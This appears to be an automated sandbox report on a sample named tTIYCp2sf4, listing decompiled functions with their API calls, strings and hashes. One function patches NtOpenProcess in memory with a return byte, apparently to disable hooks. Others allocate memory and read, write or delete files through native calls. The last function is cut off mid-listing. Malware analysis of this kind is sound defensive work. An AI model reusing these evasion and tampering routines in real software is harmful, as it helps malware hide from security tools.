Uniqueness

Uniqueness Score: -1.00%

Function 02867B24 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 43
libraryloaderinjectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E02867B24(void* __eax, CHAR* __ecx) {
				long _v20;
				void _v24;
				int _t11;
				long _t12;
				CHAR* _t15;
				struct HINSTANCE__* _t17;
				CHAR* _t18;
				void* _t19;
				void* _t20;

				_t18 = __ecx;
				_t20 = __eax;
				_v24 = 0xc3;
				_t12 = 0;
				_t17 = LoadLibraryA(_t15);
				if(_t17 > 0) {
					_t19 = GetProcAddress(_t17, _t18);
					if(_t19 != 0) {
						_t11 = WriteProcessMemory(_t20, _t19,  &_v24, 1,  &_v20); // executed
						if(_t11 != 0 && _v20 > 0) {
							_t12 = 1;
						}
					}
					FreeLibrary(_t17);
				}
				return _t12;
			}

0x02867b2b
0x02867b2d
0x02867b2f
0x02867b33
0x02867b3b
0x02867b3f
0x02867b48
0x02867b4c
0x02867b5c
0x02867b63
0x02867b6c
0x02867b6c
0x02867b63
0x02867b6f
0x02867b6f
0x02867b7c

APIs

LoadLibraryA.KERNEL32(ntdll), ref: 02867B36
GetProcAddress.KERNEL32(00000000,NtOpenProcess), ref: 02867B43
WriteProcessMemory.KERNEL32(00000000,00000000,?,00000001,?,00000000,NtOpenProcess,ntdll), ref: 02867B5C
FreeLibrary.KERNEL32(00000000,00000000,NtOpenProcess,ntdll), ref: 02867B6F

Strings

NtOpenProcess, xrefs: 02867B41
ntdll, xrefs: 02867B35

Memory Dump Source

Source File: 00000000.00000002.554764034.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true

Associated: 00000000.00000002.554751318.0000000002850000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554840460.0000000002877000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554933392.00000000028A6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554948392.00000000028A7000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2850000_tTIYCp2sf4.jbxd

Similarity

API ID: Library$AddressFreeLoadMemoryProcProcessWrite
String ID: NtOpenProcess$ntdll
API String ID: 1038025411-4273736252
Opcode ID: 9f81b1c18d594d0a60fa94a441a449b39ee5fd1e8af99caeb6e76aaa597a9114
Instruction ID: 1ebdc5a66ad9d7178fa2b667d0cf0c59a868db58a781250765cc393e43ac753e
Opcode Fuzzy Hash: 9f81b1c18d594d0a60fa94a441a449b39ee5fd1e8af99caeb6e76aaa597a9114
Instruction Fuzzy Hash: F6F0B43E5052352ED22055685C44EBFA7DCCBC26B8F54027EFE58D6280EB21CC0493E2

Uniqueness

Uniqueness Score: -1.00%

Function 028679CC Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 23
librarymemorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E028679CC(void* _a4, void* _a8, long _a12, long _a16, long _a20) {
				struct HINSTANCE__* _t7;

				_t7 = GetModuleHandleW(L"C:\\Windows\\System32\\ntdll.dll"); // executed
				 *0x28a6318 = GetProcAddress(_t7, "NtAllocateVirtualMemory");
				NtAllocateVirtualMemory(_a4,  &_a8, 0,  &_a12, _a16, _a20); // executed
				return _a8;
			}

0x028679d9
0x028679e4
0x028679ff
0x02867a09

APIs

GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 028679D9
GetProcAddress.C:\WINDOWS\SYSTEM32\KERNELBASE(00000000,C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 028679DF
NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 028679FF

Strings

NtAllocateVirtualMemory, xrefs: 028679CF
C:\Windows\System32\ntdll.dll, xrefs: 028679D4

Memory Dump Source

Source File: 00000000.00000002.554764034.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true

Associated: 00000000.00000002.554751318.0000000002850000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554840460.0000000002877000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554933392.00000000028A6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554948392.00000000028A7000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2850000_tTIYCp2sf4.jbxd

Similarity

API ID: AddressAllocateHandleMemoryModuleProcVirtual
String ID: C:\Windows\System32\ntdll.dll$NtAllocateVirtualMemory
API String ID: 421316089-2206134580
Opcode ID: ad57cdd740a7ba4f7724b0cf72f97f6ec1485e95c69d61abca2e5fb5c209410f
Instruction ID: eb5eb95693bff6950d2207977a28030dc875875264b33dc90d1c4317be0742b9
Opcode Fuzzy Hash: ad57cdd740a7ba4f7724b0cf72f97f6ec1485e95c69d61abca2e5fb5c209410f
Instruction Fuzzy Hash: 64E0E5BE540218ABEB00DE98DC49EEB77ECEB08611F044401BA15C7201DA74EA208BF1

Uniqueness

Uniqueness Score: -1.00%

Function 0286BDD8 Relevance: 7.6, APIs: 5, Instructions: 80
nativefileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 31%

			E0286BDD8(char __eax, void* __ebx, void* __edx, void* __esi) {
				char _v8;
				void* _v12;
				char _v20;
				void* _v28;
				void* _v52;
				intOrPtr _v68;
				void _v76;
				void* _t49;
				intOrPtr _t56;
				intOrPtr _t58;
				void* _t61;

				_t49 = __edx;
				_v8 = __eax;
				E02854EE4( &_v8);
				_push(_t61);
				_push(0x286bea8);
				_push( *[fs:eax]);
				 *[fs:eax] = _t61 + 0xffffffb8;
				E028544A0(_t49);
				_push(0);
				_push(0);
				_push( &_v20);
				_push(E02854DB4(_v8));
				L0286BC34();
				E0286BC3C( &_v52, 0x40,  &_v20, 0, 0, 0);
				NtOpenFile( &_v12, 0x100001,  &_v52,  &_v28, 1, 0x20); // executed
				NtQueryInformationFile(_v12,  &_v28,  &_v76, 0x18, 5);
				_t58 = _v68;
				E02854B90(_t49, _t58);
				_push(0);
				_push(0);
				_push(_t58);
				_push(E028549BC(_t49));
				_push( &_v28);
				_push(0);
				_push(0);
				_push(0);
				_push(_v12); // executed
				L02867CE0(); // executed
				NtClose(_v12);
				_pop(_t56);
				 *[fs:eax] = _t56;
				_push(0x286beaf);
				return E02854C24( &_v8);
			}

0x0286bde0
0x0286bde2
0x0286bde8
0x0286bdef
0x0286bdf0
0x0286bdf5
0x0286bdf8
0x0286bdfd
0x0286be02
0x0286be04
0x0286be09
0x0286be12
0x0286be13
0x0286be29
0x0286be43
0x0286be58
0x0286be5d
0x0286be64
0x0286be69
0x0286be6b
0x0286be6d
0x0286be75
0x0286be79
0x0286be7a
0x0286be7c
0x0286be7e
0x0286be83
0x0286be84
0x0286be8d
0x0286be94
0x0286be97
0x0286be9a
0x0286bea7

APIs

Part of subcall function 02854EE4: SysAllocStringLen.OLEAUT32(?,?), ref: 02854EF2

RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0286BEA8), ref: 0286BE13
NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,0286BEA8), ref: 0286BE43
NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 0286BE58
NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 0286BE84
NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 0286BE8D

Part of subcall function 02854C24: SysFreeString.OLEAUT32(0286C78C), ref: 02854C32

Memory Dump Source

Source File: 00000000.00000002.554764034.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true

Associated: 00000000.00000002.554751318.0000000002850000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554840460.0000000002877000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554933392.00000000028A6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554948392.00000000028A7000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2850000_tTIYCp2sf4.jbxd

Similarity

API ID: File$PathString$AllocCloseFreeInformationNameName_OpenQueryRead
String ID:
API String ID: 1897104825-0
Opcode ID: 0050bc499556f4d4d70b6bcaff688c3091e814c8f616e31c2ff7da1e7ce52512
Instruction ID: 6c22ad57228bb64483febb8a3fbc50878e732412e408bf61577ad7e1cf273b64
Opcode Fuzzy Hash: 0050bc499556f4d4d70b6bcaff688c3091e814c8f616e31c2ff7da1e7ce52512
Instruction Fuzzy Hash: 8F21D37DA503187AEB11EAD8CC46FEFB7BDEB08704F500461B600F71C0DAB4AA459B95

Uniqueness

Uniqueness Score: -1.00%

Function 0286BCF4 Relevance: 6.1, APIs: 4, Instructions: 80
nativefileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 33%

			E0286BCF4(char __eax, void* __ebx, char __edx, void* __esi) {
				char _v8;
				char _v12;
				void* _v16;
				char _v24;
				void* _v32;
				void* _v56;
				intOrPtr _t52;
				char _t54;
				void* _t58;

				_v12 = __edx;
				_v8 = __eax;
				E02854954(_v8);
				E02854EE4( &_v12);
				_push(_t58);
				_push(0x286bdc6);
				_push( *[fs:eax]);
				 *[fs:eax] = _t58 + 0xffffffcc;
				_push(0);
				_push(0);
				_push( &_v24);
				_push(E02854DB4(_v12));
				L0286BC34();
				E0286BC3C( &_v56, 0x40,  &_v24, 0, 0, 0);
				NtCreateFile( &_v16, 0x100002,  &_v56,  &_v32, 0, 0, 1, 2, 0x20, 0, 0); // executed
				_t54 = _v8;
				if(_t54 != 0) {
					_t54 =  *((intOrPtr*)(_t54 - 4));
				}
				_push(0);
				_push(0);
				_push(_t54);
				_push(E028549BC( &_v8));
				_push( &_v32);
				_push(0);
				_push(0);
				_push(0);
				_push(_v16); // executed
				L02867CE8(); // executed
				NtClose(_v16);
				_pop(_t52);
				 *[fs:eax] = _t52;
				_push(0x286bdcd);
				E02854C24( &_v12);
				return E028544A0( &_v8);
			}

0x0286bcfc
0x0286bcff
0x0286bd05
0x0286bd0d
0x0286bd14
0x0286bd15
0x0286bd1a
0x0286bd1d
0x0286bd22
0x0286bd24
0x0286bd29
0x0286bd32
0x0286bd33
0x0286bd49
0x0286bd6d
0x0286bd72
0x0286bd77
0x0286bd7c
0x0286bd7c
0x0286bd7e
0x0286bd80
0x0286bd82
0x0286bd8b
0x0286bd8f
0x0286bd90
0x0286bd92
0x0286bd94
0x0286bd99
0x0286bd9a
0x0286bda3
0x0286bdaa
0x0286bdad
0x0286bdb0
0x0286bdb8
0x0286bdc5

APIs

Part of subcall function 02854EE4: SysAllocStringLen.OLEAUT32(?,?), ref: 02854EF2

RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0286BDC6), ref: 0286BD33
NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0286BD6D
NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 0286BD9A
NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 0286BDA3

Memory Dump Source

Source File: 00000000.00000002.554764034.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true

Associated: 00000000.00000002.554751318.0000000002850000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554840460.0000000002877000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554933392.00000000028A6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554948392.00000000028A7000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2850000_tTIYCp2sf4.jbxd

Similarity

API ID: FilePath$AllocCloseCreateNameName_StringWrite
String ID:
API String ID: 3764614163-0
Opcode ID: 8e9111f731d135f3620cb3dbe0a0e431263f7b0de402e49475929c4f8023180c
Instruction ID: d137ff3563a6625d029ed558dbb21e48d94cd9f4ab44d6b49a3d3e33f408873d
Opcode Fuzzy Hash: 8e9111f731d135f3620cb3dbe0a0e431263f7b0de402e49475929c4f8023180c
Instruction Fuzzy Hash: 5021C079A40218BAFB10EA94CD46FEEB7BDEF04B04F504461B600FB1D0D7B46E449B55

Uniqueness

Uniqueness Score: -1.00%

Function 0286BC64 Relevance: 4.5, APIs: 3, Instructions: 45
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 37%

			E0286BC64(short __eax, void* __ebx) {
				short _v8;
				void* _v16;
				void* _v40;
				intOrPtr _t33;
				void* _t36;

				_v8 = __eax;
				E02854EE4( &_v8);
				_push(_t36);
				_push(0x286bcde);
				_push( *[fs:eax]);
				 *[fs:eax] = _t36 + 0xffffffdc;
				RtlInitUnicodeString( &_v16,  &_v8);
				_push(0);
				_push(0);
				_push( &_v16);
				_push(E02854DB4(_v8));
				L0286BC34();
				E0286BC3C( &_v40, 0x40,  &_v16, 0, 0, 0);
				NtDeleteFile( &_v40); // executed
				_pop(_t33);
				 *[fs:eax] = _t33;
				_push(0x286bce5);
				return E02854C24( &_v8);
			}

0x0286bc6b
0x0286bc71
0x0286bc78
0x0286bc79
0x0286bc7e
0x0286bc81
0x0286bc8c
0x0286bc91
0x0286bc93
0x0286bc98
0x0286bca1
0x0286bca2
0x0286bcb8
0x0286bcc1
0x0286bcca
0x0286bccd
0x0286bcd0
0x0286bcdd

APIs

Part of subcall function 02854EE4: SysAllocStringLen.OLEAUT32(?,?), ref: 02854EF2

RtlInitUnicodeString.N(?,?,00000000,0286BCDE), ref: 0286BC8C
RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,0286BCDE), ref: 0286BCA2
NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,0286BCDE), ref: 0286BCC1

Part of subcall function 02854C24: SysFreeString.OLEAUT32(0286C78C), ref: 02854C32

Memory Dump Source

Source File: 00000000.00000002.554764034.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true

Associated: 00000000.00000002.554751318.0000000002850000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554840460.0000000002877000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554933392.00000000028A6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554948392.00000000028A7000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2850000_tTIYCp2sf4.jbxd

Similarity

API ID: String$Path$AllocDeleteFileFreeInitNameName_Unicode
String ID:
API String ID: 1694942484-0
Opcode ID: 44701f124d2c6e4387c5fb416bea0525b49ef4e2a917b27eb914fd02aa7ce9c8
Instruction ID: 853b932f2603d542797e708f383587d445fc87a361d214efbbe32fc5a829df46
Opcode Fuzzy Hash: 44701f124d2c6e4387c5fb416bea0525b49ef4e2a917b27eb914fd02aa7ce9c8
Instruction Fuzzy Hash: 9F01F47D90420CBAEB11EBE4DD46FDEB3FEEB48708F504461A601F2580EF74AB059A65

Uniqueness

Uniqueness Score: -1.00%

Function 02866DC0 Relevance: 1.5, APIs: 1, Instructions: 48
comCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E02866DC0(intOrPtr __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v8;
				char _v24;
				char _v28;
				intOrPtr _t29;
				intOrPtr _t30;
				void* _t34;
				void* _t35;
				intOrPtr _t36;

				_t34 = _t35;
				_t36 = _t35 + 0xffffffd8;
				_push(__esi);
				_v28 = 0;
				_v8 = __eax;
				_push(_t34);
				_push(0x2866e93);
				_push( *[fs:eax]);
				 *[fs:eax] = _t36;
				_push(_t34);
				_push(0x2866e23);
				_push( *[fs:eax]);
				 *[fs:eax] = _t36;
				E02866D64(_v8, __edx, 0,  &_v24, __esi, __eflags); // executed
				_push(E02855E70(__edx));
				_push(0x2866ea4);
				_push(5);
				_push( &_v24); // executed
				L0285CDA4(); // executed
				E02866D54( &_v24);
				_pop(_t29);
				 *[fs:eax] = _t29;
				_t30 = 0;
				 *[fs:eax] = _t30;
				_push(0x2866e9a);
				return E028544A0( &_v28);
			}

0x02866dc1
0x02866dc3
0x02866dc7
0x02866dcb
0x02866dd0
0x02866dd5
0x02866dd6
0x02866ddb
0x02866dde
0x02866de3
0x02866de4
0x02866de9
0x02866dec
0x02866df5
0x02866e01
0x02866e02
0x02866e07
0x02866e0e
0x02866e0f
0x02866e14
0x02866e1b
0x02866e1e
0x02866e7f
0x02866e82
0x02866e85
0x02866e92

APIs

Part of subcall function 02866D64: CLSIDFromProgID.OLE32(00000000,?,00000000,02866DB1,?,?,?,00000000), ref: 02866D91

CoCreateInstance.OLE32(?,00000000,00000005,02866EA4,00000000,00000000,02866E23,?,00000000,02866E93), ref: 02866E0F

Memory Dump Source

Source File: 00000000.00000002.554764034.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true

Associated: 00000000.00000002.554751318.0000000002850000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554840460.0000000002877000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554933392.00000000028A6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554948392.00000000028A7000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2850000_tTIYCp2sf4.jbxd

Similarity

API ID: CreateFromInstanceProg
String ID:
API String ID: 2151042543-0
Opcode ID: 2b78cea042515522fc3979d801260cb6239fe1107b78492e5e3db708f5128ab7
Instruction ID: ddad01514dc44523ee4aac73124240eff0f0313df9f4771cea726070d12493f7
Opcode Fuzzy Hash: 2b78cea042515522fc3979d801260cb6239fe1107b78492e5e3db708f5128ab7
Instruction Fuzzy Hash: 6A01423C208784AFE701DFA8DC5687FBBADEB48B10FA14475F800D2A40F638AD00C862

Uniqueness

Uniqueness Score: -1.00%

Function 0286C930 Relevance: 159.7, APIs: 6, Strings: 82, Instructions: 5681
COMMON

Download Yara Rule

C-Code - Quality: 43%

			E0286C930(void* __ebx, void* __edi, void* __esi, void* __fp0) {
				char _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				char _v24;
				intOrPtr _v28;
				char _v32;
				char _v36;
				char _v40;
				intOrPtr _v44;
				char _v48;
				char _v52;
				char _v56;
				intOrPtr _v60;
				char _v64;
				char _v68;
				char _v72;
				intOrPtr _v76;
				char _v80;
				char _v84;
				char _v88;
				intOrPtr _v92;
				char _v96;
				char _v100;
				char _v104;
				intOrPtr _v108;
				char _v112;
				char _v116;
				char _v120;
				intOrPtr _v124;
				char _v128;
				char _v132;
				char _v136;
				char _v140;
				intOrPtr _v144;
				char _v148;
				char _v152;
				char _v156;
				intOrPtr _v160;
				char _v164;
				char _v168;
				char _v172;
				char _v176;
				intOrPtr _v180;
				char _v184;
				char _v188;
				char _v192;
				intOrPtr _v196;
				char _v200;
				char _v204;
				char _v208;
				intOrPtr _v212;
				char _v216;
				char _v220;
				char _v224;
				intOrPtr _v228;
				char _v232;
				char _v236;
				char _v240;
				intOrPtr _v244;
				char _v248;
				char _v252;
				char _v256;
				intOrPtr _v260;
				char _v264;
				char _v268;
				char _v272;
				intOrPtr _v276;
				char _v280;
				char _v284;
				char _v288;
				char _v292;
				intOrPtr _v296;
				char _v300;
				char _v304;
				char _v308;
				intOrPtr _v312;
				char _v316;
				char _v320;
				char _v324;
				intOrPtr _v328;
				char _v332;
				char _v336;
				char _v340;
				intOrPtr _v344;
				char _v348;
				char _v352;
				char _v356;
				intOrPtr _v360;
				char _v364;
				char _v368;
				char _v372;
				intOrPtr _v376;
				char _v380;
				char _v384;
				char _v388;
				intOrPtr _v392;
				char _v396;
				char _v400;
				char _v404;
				intOrPtr _v408;
				char _v412;
				char _v416;
				char _v420;
				intOrPtr _v424;
				char _v428;
				char _v432;
				char _v436;
				intOrPtr _v440;
				char _v444;
				char _v448;
				char _v452;
				intOrPtr _v456;
				char _v460;
				char _v464;
				char _v468;
				intOrPtr _v472;
				char _v476;
				char _v480;
				char _v484;
				intOrPtr _v488;
				char _v492;
				char _v496;
				char _v500;
				intOrPtr _v504;
				char _v508;
				char _v512;
				char _v516;
				intOrPtr _v520;
				char _v524;
				char _v528;
				char _v532;
				intOrPtr _v536;
				char _v540;
				char _v544;
				char _v548;
				char _v552;
				char _v556;
				intOrPtr _v560;
				char _v564;
				char _v568;
				char _v572;
				intOrPtr _v576;
				char _v580;
				char _v584;
				char _v588;
				char _v592;
				intOrPtr _v596;
				char _v600;
				char _v604;
				char _v608;
				intOrPtr _v612;
				char _v616;
				char _v620;
				char _v624;
				intOrPtr _v628;
				char _v632;
				char _v636;
				char _v640;
				intOrPtr _v644;
				char _v648;
				char _v652;
				char _v656;
				intOrPtr _v660;
				char _v664;
				char _v668;
				char _v672;
				intOrPtr _v676;
				char _v680;
				char _v684;
				char _v688;
				intOrPtr _v692;
				char _v696;
				char _v700;
				char _v704;
				char _v708;
				intOrPtr _v712;
				char _v716;
				char _v720;
				char _v724;
				intOrPtr _v728;
				char _v732;
				char _v736;
				char _v740;
				intOrPtr _v744;
				char _v748;
				char _v752;
				char _v756;
				intOrPtr _v760;
				char _v764;
				char _v768;
				char _v772;
				intOrPtr _v776;
				char _v780;
				char _v784;
				char _v788;
				intOrPtr _v792;
				char _v796;
				char _v800;
				char _v804;
				intOrPtr _v808;
				char _v812;
				char _v816;
				char _v820;
				intOrPtr _v824;
				char _v828;
				char _v832;
				char _v836;
				intOrPtr _v840;
				char _v844;
				char _v848;
				char _v852;
				intOrPtr _v856;
				char _v860;
				char _v864;
				char _v868;
				char _v872;
				intOrPtr _v876;
				char _v880;
				char _v884;
				char _v888;
				intOrPtr _v892;
				char _v896;
				char _v900;
				char _v904;
				intOrPtr _v908;
				char _v912;
				char _v916;
				char _v920;
				intOrPtr _v924;
				char _v928;
				char _v932;
				char _v936;
				intOrPtr _v940;
				char _v944;
				char _v948;
				char _v952;
				intOrPtr _v956;
				char _v960;
				char _v964;
				char _v980;
				char _v984;
				intOrPtr _v988;
				char _v992;
				char _v996;
				char _v1000;
				intOrPtr _v1004;
				char _v1008;
				char _v1012;
				intOrPtr* _v1016;
				char _v1020;
				intOrPtr _v1024;
				char _v1028;
				char _v1032;
				char _v1036;
				intOrPtr _v1040;
				char _v1044;
				char _v1048;
				char _v1052;
				char _v1056;
				intOrPtr _v1060;
				char _v1064;
				char _v1068;
				char _v1072;
				intOrPtr _v1076;
				char _v1080;
				char _v1084;
				char _v1088;
				intOrPtr _v1092;
				char _v1096;
				char _v1100;
				char _v1104;
				intOrPtr _v1108;
				char _v1112;
				char _v1116;
				char _v1120;
				intOrPtr _v1124;
				char _v1128;
				char _v1132;
				char _v1136;
				intOrPtr _v1140;
				char _v1144;
				char _v1148;
				char _v1152;
				intOrPtr _v1156;
				char _v1160;
				char _v1164;
				char _v1168;
				intOrPtr _v1172;
				char _v1176;
				char _v1180;
				char _v1184;
				char _v1188;
				intOrPtr _v1192;
				char _v1196;
				char _v1200;
				char _v1204;
				intOrPtr _v1208;
				char _v1212;
				char _v1216;
				char _v1220;
				intOrPtr _v1224;
				char _v1228;
				char _v1232;
				char _v1236;
				intOrPtr _v1240;
				char _v1244;
				char _v1248;
				char _v1252;
				char _v1256;
				intOrPtr _v1260;
				char _v1264;
				char _v1268;
				char _v1272;
				intOrPtr _v1276;
				char _v1280;
				char _v1284;
				char _v1288;
				intOrPtr _v1292;
				char _v1296;
				char _v1300;
				char _v1304;
				intOrPtr _v1308;
				char _v1312;
				char _v1316;
				char _v1320;
				char _v1324;
				char _v1328;
				intOrPtr _v1332;
				char _v1336;
				char _v1340;
				char _v1344;
				intOrPtr _v1348;
				char _v1352;
				char _v1356;
				char _v1360;
				intOrPtr _v1364;
				char _v1368;
				char _v1372;
				char _v1376;
				intOrPtr _v1380;
				char _v1384;
				char _v1388;
				char _v1392;
				intOrPtr _v1396;
				char _v1400;
				char _v1404;
				char _v1408;
				intOrPtr _v1412;
				char _v1416;
				char _v1420;
				char _v1424;
				char _v1428;
				intOrPtr _v1432;
				char _v1436;
				char _v1440;
				char _v1444;
				intOrPtr _v1448;
				char _v1452;
				char _v1456;
				char _v1460;
				char _v1464;
				intOrPtr _v1468;
				char _v1472;
				char _v1476;
				char _v1480;
				intOrPtr _v1484;
				char _v1488;
				char _v1492;
				char _v1496;
				intOrPtr _v1500;
				char _v1504;
				char _v1508;
				char _v1512;
				intOrPtr _v1516;
				char _v1520;
				char _v1524;
				char _v1528;
				intOrPtr _v1532;
				char _v1536;
				char _v1540;
				char _v1544;
				intOrPtr _v1548;
				char _v1552;
				char _v1556;
				char _v1560;
				intOrPtr _v1564;
				char _v1568;
				intOrPtr _v1572;
				char _v1576;
				char _v1580;
				char _v1584;
				intOrPtr _v1588;
				char _v1592;
				char _v1596;
				char _v1600;
				intOrPtr _v1604;
				char _v1608;
				char _v1612;
				intOrPtr _v1616;
				char _v1620;
				intOrPtr _v1624;
				char _v1628;
				char _v1632;
				char _v1636;
				intOrPtr _v1640;
				char _v1644;
				char _v1648;
				char _v1652;
				intOrPtr _v1656;
				char _v1660;
				char _v1664;
				char _v1668;
				intOrPtr _v1672;
				char _v1676;
				char _v1680;
				char _v1684;
				intOrPtr _v1688;
				char _v1692;
				char _v1696;
				intOrPtr _v1700;
				char _v1704;
				intOrPtr _v1708;
				char _v1712;
				char _v1716;
				char _v1720;
				intOrPtr _v1724;
				char _v1728;
				char _v1732;
				char _v1736;
				intOrPtr _v1740;
				char _v1744;
				char _v1748;
				char _v1752;
				intOrPtr _v1756;
				char _v1760;
				char _v1764;
				char _v1768;
				intOrPtr _v1772;
				char _v1776;
				char _v1780;
				char _v1784;
				char _v1788;
				char _v1792;
				char _v1796;
				intOrPtr _v1800;
				char _v1804;
				char _v1808;
				char _v1812;
				intOrPtr _v1816;
				char _v1820;
				char _v1824;
				char _v1828;
				intOrPtr _v1832;
				char _v1836;
				char _v1840;
				char _v1844;
				intOrPtr _v1848;
				char _v1852;
				char _v1856;
				char _v1860;
				intOrPtr _v1864;
				char _v1868;
				char _v1872;
				char _v1876;
				intOrPtr _v1880;
				char _v1884;
				char _v1888;
				char _v1892;
				intOrPtr _v1896;
				char _v1900;
				char _v1904;
				char _v1908;
				intOrPtr _v1912;
				char _v1916;
				char _v1920;
				void* _v1924;
				char _v1928;
				char _v1932;
				char _v1936;
				intOrPtr _v1940;
				char _v1944;
				char _v1948;
				char _v1952;
				intOrPtr _v1956;
				char _v1960;
				char _v1964;
				char _v1968;
				char _v1972;
				char _v1976;
				intOrPtr _v1980;
				char _v1984;
				char _v1988;
				char _v1992;
				intOrPtr _v1996;
				char _v2000;
				char _v2004;
				char _v2008;
				intOrPtr _v2012;
				char _v2104;
				char _v2108;
				intOrPtr _v2112;
				char _v2116;
				char _v2120;
				char _v2124;
				intOrPtr _v2128;
				char _v2132;
				char _v2136;
				char _v2140;
				char _v2144;
				intOrPtr _v2148;
				char _v2152;
				char _v2156;
				char _v2160;
				intOrPtr _v2164;
				char _v2168;
				char _v2172;
				char _v2176;
				intOrPtr _v2180;
				char _v2184;
				char _v2188;
				char _v2192;
				char _v2196;
				intOrPtr _v2200;
				char _v2204;
				char _v2208;
				char _v2212;
				intOrPtr _v2216;
				char _v2220;
				char _v2224;
				char _v2228;
				intOrPtr _v2232;
				char _v2236;
				char _v2240;
				char _v2244;
				char _v2248;
				char _v2252;
				intOrPtr _v2256;
				char _v2260;
				char _v2264;
				char _v2268;
				intOrPtr _v2272;
				char _v2276;
				char _v2280;
				char _v2284;
				intOrPtr _v2288;
				char _v2292;
				char _v2296;
				char _v2300;
				intOrPtr _v2304;
				char _v2308;
				intOrPtr _v2312;
				char _v2316;
				char _v2320;
				char _v2324;
				char _v2328;
				intOrPtr _v2332;
				char _v2336;
				char _v2340;
				char _v2344;
				intOrPtr _v2348;
				char _v2352;
				char _v2356;
				char _v2360;
				intOrPtr _v2364;
				char _v2368;
				char _v2372;
				char _v2376;
				char _v2380;
				intOrPtr _v2384;
				char _v2388;
				char _v2392;
				char _v2396;
				intOrPtr _v2400;
				char _v2452;
				char _v2456;
				char _v2460;
				char _v2464;
				char _v2516;
				char _v2568;
				char _v2572;
				char _v2576;
				char _v2580;
				char _v2680;
				char _v2684;
				char _v2688;
				char _v2692;
				char _v2844;
				char _v2848;
				char _v2852;
				char _v2856;
				char _v2904;
				char _v2908;
				char _v2920;
				char _v2988;
				char _v3276;
				char _v3300;
				char _v3332;
				char _v3344;
				char _v3348;
				intOrPtr _v3352;
				char _v3356;
				char _v3360;
				char _v3364;
				intOrPtr _v3368;
				char _v3372;
				char _v3376;
				char _v3380;
				intOrPtr _v3384;
				char _v3388;
				char _v3392;
				char _v3396;
				intOrPtr _v3400;
				char _v3404;
				char _v3408;
				char _v3412;
				intOrPtr _v3416;
				char _v3420;
				char _v3424;
				char _v3428;
				intOrPtr _v3432;
				char _v3436;
